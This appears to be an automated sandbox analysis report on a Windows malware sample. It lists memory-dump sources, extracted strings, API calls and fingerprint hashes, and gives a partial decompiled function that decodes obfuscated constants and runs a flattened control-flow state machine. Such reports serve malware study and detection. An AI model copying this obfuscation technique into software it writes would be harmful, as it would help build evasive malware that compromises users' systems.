0x00a7a588
0x00a7a58e
0x00a7a7b8
0x00a7a7be
0x00a7a838
0x00a7a83f
0x00a7a88f
0x00a7a88f
0x00000000
0x00a7a88f
0x00a7a868
0x00a7a86d
0x00a7a870
0x00a7a877
0x00a7a88a
0x00000000
0x00a7a88a
0x00a7a879
0x00000000
0x00a7a879
0x00a7a7c0
0x00a7a7c6
0x00a7a822
0x00a7a827
0x00a7a82e
0x00000000
0x00a7a82e
0x00a7a7c8
0x00a7a7ce
0x00a7a805
0x00a7a80a
0x00000000
0x00a7a80a
0x00a7a7d0
0x00a7a7d6
0x00000000
0x00000000
0x00a7a7e7
0x00a7a7ec
0x00a7a7ee
0x00000000
0x00000000
0x00a7a7f4
0x00000000
0x00a7a7f4
0x00a7a594
0x00a7a7a2
0x00a7a7a7
0x00a7a7ae
0x00000000
0x00a7a7ae
0x00a7a5a0
0x00a7a78c
0x00a7a791
0x00000000
0x00a7a791
0x00a7a5ac
0x00a7a6d1
0x00a7a6ff
0x00a7a720
0x00a7a742
0x00a7a74a
0x00a7a750
0x00a7a771
0x00a7a776
0x00000000
0x00a7a776
0x00a7a5b8
0x00a7a68b
0x00a7a690
0x00a7a697
0x00a7a69f
0x00000000
0x00a7a69f
0x00a7a5c4
0x00000000
0x00000000
0x00a7a5e7
0x00a7a5ed
0x00a7a5f0
0x00a7a62f
0x00a7a636
0x00a7a639
0x00a7a645
0x00a7a647
0x00a7a64e
0x00a7a64e
0x00000000
0x00a7a64e
0x00a7a649
0x00a7a64c
0x00a7a625
0x00a7a625
0x00000000
0x00a7a625
0x00000000
0x00a7a64c
0x00a7a63b
0x00000000
0x00a7a63b
0x00a7a60b
0x00a7a60c
0x00a7a610
0x00a7a612
0x00a7a619
0x00a7a61e
0x00a7a621
0x00a7a623
0x00000000
0x00a7a623
0x00a7aa47
0x00a7aa4d
0x00a7ac6a
0x00a7ac70
0x00a7ad69
0x00a7ad6f
0x00a7adf6
0x00a7adfb
0x00a7adfd
0x00a7ae06
0x00a7ae06
0x00a7ae0b
0x00000000
0x00a7ae0b
0x00a7ad71
0x00a7ad77
0x00a7adde
0x00a7ade5
0x00000000
0x00a7ade5
0x00a7ad79
0x00a7ad7f
0x00000000
0x00000000
0x00a7ad8c
0x00a7ad98
0x00a7adb2
0x00a7adb3
0x00a7adba
0x00a7adbc
0x00a7adc3
0x00a7adc8
0x00a7adcb
0x00a7acc8
0x00a7acc8
0x00000000
0x00a7acc8
0x00a7ac76
0x00a7ad52
0x00a7ad57
0x00a7ad59
0x00000000
0x00000000
0x00a7ad5f
0x00000000
0x00a7ad5f
0x00a7ac7c
0x00a7ac82
0x00a7ad1c
0x00a7ad28
0x00a7ad31
0x00a7ad39
0x00000000
0x00a7ad39
0x00a7ac88
0x00a7ac8e
0x00a7ad06
0x00a7ad0b
0x00000000
0x00a7ad0b
0x00a7ac90
0x00a7ac92
0x00a7ace8
0x00a7aced
0x00a7acee
0x00000000
0x00a7acee
0x00a7ac94
0x00a7ac9a
0x00000000
0x00000000
0x00a7acb9
0x00a7acc0
0x00a7acc5
0x00000000
0x00a7acc5
0x00a7aa53
0x00a7ac5b
0x00a7ac60
0x00000000
0x00a7ac60
0x00a7aa59
0x00a7aa5f
0x00a7ab9b
0x00a7aba1
0x00a7ac3e
0x00a7ac43
0x00000000
0x00a7ac43
0x00a7aba7
0x00a7abad
0x00a7ac15
0x00a7ac1c
0x00a7ac21
0x00a7ac22
0x00a7ac29
0x00000000
0x00a7ac29
0x00a7abaf
0x00a7abb5
0x00a7abe8
0x00a7abec
0x00a7abee
0x00000000
0x00a7abee
0x00a7abb7
0x00a7abbd
0x00000000
0x00000000
0x00a7abd1
0x00a7abd6
0x00a7abd8
0x00000000
0x00000000
0x00a7abde
0x00000000
0x00a7abde
0x00a7aa65
0x00a7ab7f
0x00a7ab88
0x00a7ab90
0x00000000
0x00a7ab90
0x00a7aa6b
0x00a7aa71
0x00a7ab5d
0x00a7ab62
0x00a7ab64
0x00000000
0x00000000
0x00a7ab6a
0x00000000
0x00a7ab6a
0x00a7aa77
0x00a7aa7d
0x00a7ab4f
0x00000000
0x00a7ab4f
0x00a7aa83
0x00a7aa89
0x00a7aac0
0x00a7aac5
0x00a7aac6
0x00a7aac8
0x00a7aad3
0x00a7aada
0x00a7aadc
0x00a7aaf1
0x00a7aaf2
0x00a7aaf6
0x00a7aaf8
0x00a7ab01
0x00a7ab03
0x00a7ab06
0x00a7ab06
0x00a7ab0d
0x00a7ab10
0x00a7ab28
0x00a7ab29
0x00a7ab30
0x00a7ab32
0x00a7ab39
0x00a7ab3e
0x00a7ab41
0x00a7ab41
0x00a7aaca
0x00a7aaca
0x00a7aaca
0x00a7ab43
0x00a7ab45
0x00000000
0x00a7ab45
0x00a7aa8b
0x00a7aa91
0x00000000
0x00000000
0x00a7aa9b
0x00a7aaa0
0x00000000
0x00a7ae10
0x00a7ae10
0x00a7ae10
0x00000000

Strings

CK, xrefs: 00A7987E
*p, xrefs: 00A79658
fM6, xrefs: 00A79E32
~/, xrefs: 00A795DB
qM0, xrefs: 00A7A4BA
[, xrefs: 00A79BC2
jo, xrefs: 00A79F8C
l?U, xrefs: 00A798EB
Ao, xrefs: 00A7A2C0
td, xrefs: 00A79DF6
,H<, xrefs: 00A7A351
;, xrefs: 00A79F68
u+J, xrefs: 00A7AE0B
&\b, xrefs: 00A7A564
&\b, xrefs: 00A7ACEE
u+J, xrefs: 00A7A625
&]^, xrefs: 00A7A24E
oC., xrefs: 00A79207
@0, xrefs: 00A7939A
ll, xrefs: 00A79788
~c, xrefs: 00A797D6
8YNn, xrefs: 00A79235
u+J, xrefs: 00A7A952
q, xrefs: 00A79268
]p, xrefs: 00A7940D

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: qM0$&\b$&\b$&]^$*p$,H<$8YNn$@0$Ao$CK$]p$fM6$jo$l?U$ll$oC.$td$u+J$u+J$u+J$~/$;$~c$[$q
API String ID: 0-640385374
Opcode ID: 6766a4bb7b1d953d4d74a0c1afa9b0e5480ebdd0e0fa99ae957cfd4684017c0c
Instruction ID: 95f0bacffbb01cee28613bf381bc32700beaab4cd8f465e14d0b6d441fbf2678
Opcode Fuzzy Hash: 6766a4bb7b1d953d4d74a0c1afa9b0e5480ebdd0e0fa99ae957cfd4684017c0c
Instruction Fuzzy Hash: F6D2FE729093809BD3B8DF24C98A6DFBBE1BBD4704F10891DE59D96260DBB489498F43

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8D380, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6EA8D3BC
HeapAlloc.KERNEL32(00B70000,00000000,0000000A), ref: 6EA8D3D3

Strings

RUST_BACKTRACE, xrefs: 6EA8D48A, 6EA8D4C0

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID: RUST_BACKTRACE
API String ID: 1617791916-3454309823
Opcode ID: 05ce507f397b88ed4c69610d6774ddd4193a63b17c8c6a886a721b5b72d3bfe0
Instruction ID: 1d3f78bb542d0406b4aa9290bcf09eacd1be6505e45f48e7f5d8782e0760d52f
Opcode Fuzzy Hash: 05ce507f397b88ed4c69610d6774ddd4193a63b17c8c6a886a721b5b72d3bfe0
Instruction Fuzzy Hash: 0E02BE71E102198BDB14CF98C8947DEBBF9BF49314F28816AE419BB280D7756C81CF59

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8E4E0, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6EA8E520
LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6EA8E533
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6EA8E564
GetProcAddress.KERNEL32(SymSetOptions), ref: 6EA8E592
GetProcAddress.KERNEL32(SymInitializeW), ref: 6EA8E5C2
GetCurrentProcess.KERNEL32 ref: 6EA8E5D7
CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6EA8E5F5
CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6EA8E613

Part of subcall function 6EA8E6D0: ReleaseMutex.KERNEL32(?,6EA8E448), ref: 6EA8E6D1

Strings

called `Option::unwrap()` on a `None` value, xrefs: 6EA8E651, 6EA8E674, 6EA8E697
Local\RustBacktraceMutex, xrefs: 6EA8E5EC
SymInitializeW, xrefs: 6EA8E5B7
SymSetOptions, xrefs: 6EA8E587
dbghelp.dll, xrefs: 6EA8E52E
SymGetOptions, xrefs: 6EA8E55E

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
API String ID: 1067696788-3213342004
Opcode ID: 013d2d7f676c598f9497f55e13288b2a9d27645979fa3c546e31ad9ca47c6847
Instruction ID: 7cce8dc11ef11f84a0475d1d8fc5289afb8f90d8f629dac2f8570f8284348b75
Opcode Fuzzy Hash: 013d2d7f676c598f9497f55e13288b2a9d27645979fa3c546e31ad9ca47c6847
Instruction Fuzzy Hash: 3241E371F407419BEF109FE88D5479BB6E9BB45714F00C43DE405AB380EB349886876A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8E6E0, Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 588libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(SymFromAddrW), ref: 6EA8E806
GetCurrentProcess.KERNEL32 ref: 6EA8E81B

Strings

called `Option::unwrap()` on a `None` value, xrefs: 6EA8EFD5, 6EA8EFF8, 6EA8F01B, 6EA8F03E
SymFromInlineContextW, xrefs: 6EA8EA8E
SymGetLineFromInlineContextW, xrefs: 6EA8EDE1
SymFromAddrW, xrefs: 6EA8E7FB
SymGetLineFromAddrW64, xrefs: 6EA8ED38

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCurrentProcProcess
String ID: SymFromAddrW$SymFromInlineContextW$SymGetLineFromAddrW64$SymGetLineFromInlineContextW$called `Option::unwrap()` on a `None` value
API String ID: 3217270580-808744031
Opcode ID: c4c8f03ac9710bf4bd42c266322f989161c1da75be50aa5b95cee03cca561b31
Instruction ID: bc1d7be70433ecf9f3dc861e3bafe76d41b4bfc5f3bbc6f2e33d30f1cb3b7e39
Opcode Fuzzy Hash: c4c8f03ac9710bf4bd42c266322f989161c1da75be50aa5b95cee03cca561b31
Instruction Fuzzy Hash: D6426870904B41CFE7258F69C880BE3B7F1FF89314F10892ED59A87A50E775A886CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00A7F561, Relevance: 21.9, Strings: 17, Instructions: 663
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00A7F561(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				unsigned int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				void* _t761;
				void* _t763;
				void* _t772;
				void* _t780;
				intOrPtr _t792;
				void* _t795;
				signed int _t797;
				void* _t808;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				void* _t829;
				void* _t832;
				void* _t889;
				void* _t913;
				void* _t916;
				intOrPtr _t917;
				void* _t921;
				signed int* _t923;
				void* _t925;

				_t923 =  &_v392;
				_v200 = 0x89ca81;
				_v200 = _v200 * 0x5d;
				_t921 = 0;
				_v200 = _v200 ^ 0xaf9dd6ae;
				_t808 = 0xf774147;
				_v200 = _v200 ^ 0xd0d10238;
				_v340 = 0x7031b3;
				_v340 = _v340 << 9;
				_v340 = _v340 + 0xdab9;
				_v76 = __ecx;
				_t814 = 0x5e;
				_v340 = _v340 / _t814;
				_v340 = _v340 ^ 0x02631bed;
				_v344 = 0x913049;
				_v344 = _v344 >> 6;
				_v344 = _v344 + 0xffffeb40;
				_v344 = _v344 >> 9;
				_v344 = _v344 ^ 0x00000118;
				_v208 = 0xd820b3;
				_t815 = 0x11;
				_v208 = _v208 * 0x75;
				_v208 = _v208 / _t815;
				_v208 = _v208 ^ 0x05cf77a2;
				_v264 = 0x2d7b5a;
				_v264 = _v264 >> 3;
				_t816 = 0x60;
				_v264 = _v264 / _t816;
				_v264 = _v264 ^ 0x00000f29;
				_v228 = 0x9ea28;
				_v228 = _v228 >> 4;
				_v228 = _v228 << 3;
				_v228 = _v228 ^ 0x0004f510;
				_v212 = 0xfc5601;
				_t817 = 0x65;
				_v212 = _v212 * 0x23;
				_v212 = _v212 ^ 0x83bd7763;
				_v212 = _v212 ^ 0xa1c2b540;
				_v216 = 0xc9f780;
				_v216 = _v216 >> 0xd;
				_v216 = _v216 << 0xa;
				_v216 = _v216 ^ 0x00193c00;
				_v100 = 0xa15ef3;
				_v100 = _v100 + 0xcfb3;
				_v100 = _v100 ^ 0x00a22ea6;
				_v128 = 0x732cc;
				_v128 = _v128 ^ 0x331cc4bd;
				_v128 = _v128 ^ 0x331bf671;
				_v260 = 0x567154;
				_v260 = _v260 + 0x98f2;
				_v260 = _v260 | 0x07205bc1;
				_v260 = _v260 ^ 0x07775bc7;
				_v296 = 0xb824e0;
				_v296 = _v296 ^ 0x4344e171;
				_v296 = _v296 << 5;
				_v296 = _v296 << 9;
				_v296 = _v296 ^ 0x31644000;
				_v392 = 0xb375bd;
				_v392 = _v392 / _t817;
				_v392 = _v392 + 0x740b;
				_v392 = _v392 ^ 0x46953f20;
				_v392 = _v392 ^ 0x469705e9;
				_v380 = 0x6f0fc1;
				_v380 = _v380 + 0x682a;
				_v380 = _v380 << 0x10;
				_t818 = 0x35;
				_v380 = _v380 / _t818;
				_v380 = _v380 ^ 0x02448a90;
				_v232 = 0xb7f463;
				_v232 = _v232 >> 2;
				_t819 = 0x16;
				_v232 = _v232 / _t819;
				_v232 = _v232 ^ 0x000b0aa6;
				_v184 = 0x1e2afb;
				_v184 = _v184 << 1;
				_v184 = _v184 ^ 0x0039344d;
				_v272 = 0xd60a24;
				_v272 = _v272 >> 0x10;
				_v272 = _v272 << 8;
				_v272 = _v272 ^ 0x0007d834;
				_v88 = 0xccda6;
				_v88 = _v88 | 0xd009f965;
				_v88 = _v88 ^ 0xd00eb16a;
				_v160 = 0x116f8;
				_v160 = _v160 << 1;
				_v160 = _v160 ^ 0x00010446;
				_v332 = 0xe14840;
				_v332 = _v332 + 0xe9af;
				_v332 = _v332 << 5;
				_t820 = 0x52;
				_v332 = _v332 * 5;
				_v332 = _v332 ^ 0x8d5f04ba;
				_v112 = 0x9b5594;
				_v112 = _v112 + 0x8c2;
				_v112 = _v112 ^ 0x009353c4;
				_v152 = 0xaad272;
				_v152 = _v152 + 0xa340;
				_v152 = _v152 ^ 0x00a74a81;
				_v224 = 0xfde353;
				_v224 = _v224 >> 0xd;
				_v224 = _v224 * 0x71;
				_v224 = _v224 ^ 0x0000f406;
				_v372 = 0x10fd3f;
				_v372 = _v372 / _t820;
				_v372 = _v372 * 0x26;
				_v372 = _v372 ^ 0x900c513e;
				_v372 = _v372 ^ 0x9009d373;
				_v192 = 0x9bc28f;
				_v192 = _v192 ^ 0x8daa98a9;
				_v192 = _v192 >> 2;
				_v192 = _v192 ^ 0x234acdcf;
				_v256 = 0x6a542c;
				_v256 = _v256 << 6;
				_v256 = _v256 + 0xcf70;
				_v256 = _v256 ^ 0x1a90167c;
				_v308 = 0xb0ac3a;
				_v308 = _v308 + 0xffff0ba4;
				_v308 = _v308 >> 7;
				_v308 = _v308 ^ 0x7a292cfc;
				_v308 = _v308 ^ 0x7a298d34;
				_v352 = 0x7fa15;
				_v352 = _v352 << 8;
				_v352 = _v352 + 0x42c8;
				_v352 = _v352 ^ 0x420546d7;
				_v352 = _v352 ^ 0x45f279ac;
				_v172 = 0x3c10dc;
				_v172 = _v172 + 0x934c;
				_v172 = _v172 ^ 0x003c5902;
				_v252 = 0x8e9148;
				_t821 = 0x3d;
				_v252 = _v252 * 0x15;
				_v252 = _v252 >> 8;
				_v252 = _v252 ^ 0x0000fb60;
				_v164 = 0x57b7bf;
				_v164 = _v164 * 0x65;
				_v164 = _v164 ^ 0x2299a995;
				_v336 = 0xdc0eaf;
				_v336 = _v336 << 3;
				_v336 = _v336 + 0xdead;
				_v336 = _v336 + 0x5890;
				_v336 = _v336 ^ 0x06efbc16;
				_v148 = 0x5f891c;
				_v148 = _v148 + 0xe952;
				_v148 = _v148 ^ 0x00699f2d;
				_v156 = 0xb9bdf1;
				_v156 = _v156 * 0x30;
				_v156 = _v156 ^ 0x22d92b94;
				_v328 = 0xdd275a;
				_v328 = _v328 ^ 0xf9c8fd87;
				_v328 = _v328 | 0xb4ffffed;
				_v328 = _v328 ^ 0xfdf2704c;
				_v220 = 0xdc69da;
				_v220 = _v220 / _t821;
				_v220 = _v220 ^ 0xf70c1774;
				_v220 = _v220 ^ 0xf706e836;
				_v236 = 0xe3f700;
				_v236 = _v236 << 6;
				_v236 = _v236 | 0x5d8b8659;
				_v236 = _v236 ^ 0x7dfec952;
				_v132 = 0xe887ef;
				_t822 = 7;
				_v132 = _v132 / _t822;
				_v132 = _v132 ^ 0x0024c858;
				_v140 = 0xc58056;
				_v140 = _v140 >> 5;
				_v140 = _v140 ^ 0x0004a47e;
				_v244 = 0x7835a9;
				_v244 = _v244 >> 5;
				_v244 = _v244 + 0xffff434e;
				_v244 = _v244 ^ 0x000b19d5;
				_v124 = 0x628bac;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 ^ 0x000d99ba;
				_v196 = 0x3c4d43;
				_v196 = _v196 << 0xe;
				_v196 = _v196 ^ 0x3d5f35f5;
				_v196 = _v196 ^ 0x2e03dce1;
				_v204 = 0x3d8ce2;
				_v204 = _v204 + 0x9c91;
				_v204 = _v204 ^ 0x7a1df218;
				_v204 = _v204 ^ 0x7a210bc9;
				_v188 = 0x2b0ddf;
				_v188 = _v188 >> 0xe;
				_v188 = _v188 >> 0xf;
				_v188 = _v188 ^ 0x00037781;
				_v312 = 0x266488;
				_t823 = 0x3c;
				_v312 = _v312 / _t823;
				_v312 = _v312 >> 2;
				_v312 = _v312 + 0xffff0572;
				_v312 = _v312 ^ 0xffff9b33;
				_v320 = 0xbcf7b8;
				_t824 = 0x39;
				_v320 = _v320 * 0x6b;
				_v320 = _v320 * 0x26;
				_v320 = _v320 / _t824;
				_v320 = _v320 ^ 0x034e55e7;
				_v364 = 0xfcda34;
				_v364 = _v364 + 0xdb03;
				_v364 = _v364 >> 6;
				_v364 = _v364 + 0xabad;
				_v364 = _v364 ^ 0x000f61ab;
				_v92 = 0x2a2b0e;
				_v92 = _v92 + 0x4979;
				_v92 = _v92 ^ 0x0021c920;
				_v144 = 0xa1e216;
				_v144 = _v144 + 0xffff5ff5;
				_v144 = _v144 ^ 0x00ad0a84;
				_v356 = 0xcae231;
				_v356 = _v356 >> 0xc;
				_v356 = _v356 | 0xfd8e10ca;
				_t825 = 0x72;
				_v356 = _v356 * 0x5c;
				_v356 = _v356 ^ 0x1f1c568f;
				_v324 = 0x253eae;
				_v324 = _v324 >> 2;
				_v324 = _v324 | 0xf8fd8aec;
				_v324 = _v324 + 0x754e;
				_v324 = _v324 ^ 0xf8f18caa;
				_v240 = 0xb94b94;
				_v240 = _v240 + 0xffff03b1;
				_v240 = _v240 + 0xc1ea;
				_v240 = _v240 ^ 0x00b636b6;
				_v248 = 0x665da;
				_v248 = _v248 / _t825;
				_v248 = _v248 ^ 0xe7146895;
				_v248 = _v248 ^ 0xe71d8416;
				_v136 = 0xf03201;
				_v136 = _v136 | 0x16662734;
				_v136 = _v136 ^ 0x16f8276c;
				_v348 = 0xf58dc;
				_v348 = _v348 | 0xcefb25f5;
				_v348 = _v348 ^ 0xb79d248d;
				_v348 = _v348 * 5;
				_v348 = _v348 ^ 0x5ee99df0;
				_v292 = 0x1bda;
				_v292 = _v292 ^ 0xf0c300cc;
				_v292 = _v292 | 0x62eaa242;
				_v292 = _v292 ^ 0x0fb5f6bf;
				_v292 = _v292 ^ 0xfd545b0a;
				_v388 = 0x7e987;
				_v388 = _v388 | 0xe51d24f3;
				_v388 = _v388 << 1;
				_v388 = _v388 | 0xd459dc12;
				_v388 = _v388 ^ 0xde72c5d1;
				_v168 = 0x6f1542;
				_v168 = _v168 >> 0xb;
				_v168 = _v168 ^ 0x00095e82;
				_v316 = 0xeb0c05;
				_v316 = _v316 * 0x34;
				_v316 = _v316 ^ 0x9a011e6d;
				_v316 = _v316 + 0xffffdd41;
				_v316 = _v316 ^ 0xb5bd4b4c;
				_v108 = 0x4384da;
				_v108 = _v108 << 7;
				_v108 = _v108 ^ 0x21ca9036;
				_v376 = 0x26f029;
				_v376 = _v376 | 0x5c3fc44f;
				_v376 = _v376 * 0x5e;
				_v376 = _v376 << 0xa;
				_v376 = _v376 ^ 0xef0e7155;
				_v120 = 0xfb00c8;
				_t826 = 0x70;
				_v120 = _v120 / _t826;
				_v120 = _v120 ^ 0x0007bcc6;
				_v104 = 0x83a54a;
				_v104 = _v104 + 0xffff432b;
				_v104 = _v104 ^ 0x008e71dd;
				_v384 = 0x2ff4f3;
				_v384 = _v384 | 0xd0f2a060;
				_v384 = _v384 << 0xc;
				_t827 = 0x63;
				_v384 = _v384 * 0x15;
				_v384 = _v384 ^ 0xf17b8b1a;
				_v284 = 0x7bc7d6;
				_v284 = _v284 | 0xfb469b5d;
				_v284 = _v284 >> 0x10;
				_v284 = _v284 ^ 0x000029d1;
				_v276 = 0xc7b492;
				_v276 = _v276 ^ 0xda7fe355;
				_v276 = _v276 ^ 0xf789276a;
				_v276 = _v276 ^ 0x2d34b316;
				_v280 = 0xc4b066;
				_v280 = _v280 + 0x2d4a;
				_v280 = _v280 ^ 0x79b35fac;
				_v280 = _v280 ^ 0x79759ff7;
				_v360 = 0x6bdb51;
				_v360 = _v360 << 4;
				_v360 = _v360 >> 7;
				_v360 = _v360 / _t827;
				_v360 = _v360 ^ 0x0009f0c5;
				_v180 = 0xdedf2a;
				_t828 = 0x4a;
				_v180 = _v180 * 0x51;
				_v180 = _v180 ^ 0x46824d47;
				_v368 = 0xc3e69e;
				_v368 = _v368 + 0xffff984d;
				_v368 = _v368 * 0x6d;
				_v368 = _v368 * 0x79;
				_v368 = _v368 ^ 0x57d87162;
				_v300 = 0x54bd4a;
				_v300 = _v300 | 0xb63244a0;
				_v300 = _v300 + 0x417e;
				_v300 = _v300 | 0x63a11be6;
				_v300 = _v300 ^ 0xf7f931f3;
				_v268 = 0xbea848;
				_v268 = _v268 >> 9;
				_v268 = _v268 | 0x5eb62668;
				_v268 = _v268 ^ 0x5eb9ee94;
				_v96 = 0x440258;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x0009723b;
				_v176 = 0x3b19f4;
				_v176 = _v176 / _t828;
				_v176 = _v176 ^ 0x0001c2c1;
				_v116 = 0x144365;
				_v116 = _v116 | 0x65ecb7a2;
				_v116 = _v116 ^ 0x65f0ee99;
				_v288 = 0xea5434;
				_v288 = _v288 >> 1;
				_v288 = _v288 | 0xb6140203;
				_v288 = _v288 >> 9;
				_v288 = _v288 ^ 0x0050b8a2;
				_v304 = 0x566331;
				_t916 = 0x8e3f5ae;
				_v304 = _v304 >> 4;
				_t913 = 0xf1618c3;
				_v304 = _v304 >> 9;
				_v304 = _v304 >> 5;
				_v304 = _v304 ^ 0x000acbce;
				_v72 = 0x20;
				while(1) {
					L1:
					_t829 = 0xfce4db5;
					_t761 = 0x8c7d07e;
					_t889 = 0x74c5c61;
					do {
						while(1) {
							L2:
							_t925 = _t808 - _t916;
							if(_t925 <= 0) {
								break;
							}
							__eflags = _t808 - _t913;
							if(_t808 == _t913) {
								E00A62CF9(_v116, _v288, _v296, _v304, _v84);
								_t923 =  &(_t923[3]);
								_t808 = 0x3abff5b;
								goto L24;
							} else {
								__eflags = _t808 - 0xf774147;
								if(__eflags == 0) {
									_t808 = 0x77e61bb;
									continue;
								} else {
									__eflags = _t808 - _t829;
									if(__eflags == 0) {
										_push(0xa61648);
										_t917 = E00A80AD3(_v352, _v172, __eflags);
										 *_t923 = 0xa61678;
										_t795 = E00A80AD3(_v252, _v164, __eflags);
										_v64 = _v344;
										_t797 = E00A6F14F(_v336, _t917, _v148, _v156);
										_v56 = _v56 & 0x00000000;
										_v60 = _t917;
										_v52 = 1;
										_v68 = 2 + _t797 * 2;
										_v48 =  &_v68;
										_v80 = _v72;
										__eflags = E00A6386E(_v328,  &_v80, _v220, _v228, _v236,  &_v32, _v132,  &_v56, _v76, _v140, _v244, _v72, _t795) - _v212;
										_t808 =  ==  ? 0x74c5c61 : 0xf1618c3;
										E00A72EED(_v124, _v196, _v204, _t917);
										_t923 =  &(_t923[0x10]);
										E00A72EED(_v188, _v312, _v320, _t795);
										L11:
										_t913 = 0xf1618c3;
										L12:
										_t916 = 0x8e3f5ae;
										L24:
										_t761 = 0x8c7d07e;
										_t829 = 0xfce4db5;
										_t889 = 0x74c5c61;
									}
								}
							}
							goto L25;
						}
						if(_t925 == 0) {
							_t763 = E00A80AD3(_v316, _v108, __eflags);
							_t832 = 0xa61708;
							_t918 = _t763;
							_v44 = _v200;
							_v40 = _v340;
							_v36 = _v392;
							_t772 = E00A7C50B(_v376, _v84,  *((intOrPtr*)( *0xa85be0 + 0xc)), _t832, _v120, _v104,  *0xa85be0 + 0x70, _t832, _v128,  &_v44,  *((intOrPtr*)( *0xa85be0 + 8)), _v384, _t763, _v284, _v276, _v280);
							_t923 =  &(_t923[0xe]);
							__eflags = _t772 - _v260;
							if(_t772 != _v260) {
								_t808 = 0x88fbe98;
							} else {
								_t808 = _t913;
								_t921 = 1;
							}
							E00A72EED(_v360, _v180, _v368, _t918);
							goto L12;
						} else {
							if(_t808 == _t889) {
								_push(0xa61618);
								__eflags = E00A65894(_v144,  *0xa85be0 + 0xc, _v356,  &_v80, _v324, _v240, E00A80AD3(_v364, _v92, __eflags), _v216, _v248, _v84) - _v100;
								_t808 =  ==  ? 0x8c7d07e : _t913;
								E00A72EED(_v136, _v348, _v292, _t774);
								_t923 =  &(_t923[0xb]);
								goto L12;
							} else {
								if(_t808 == 0x77e61bb) {
									_push(0xa61738);
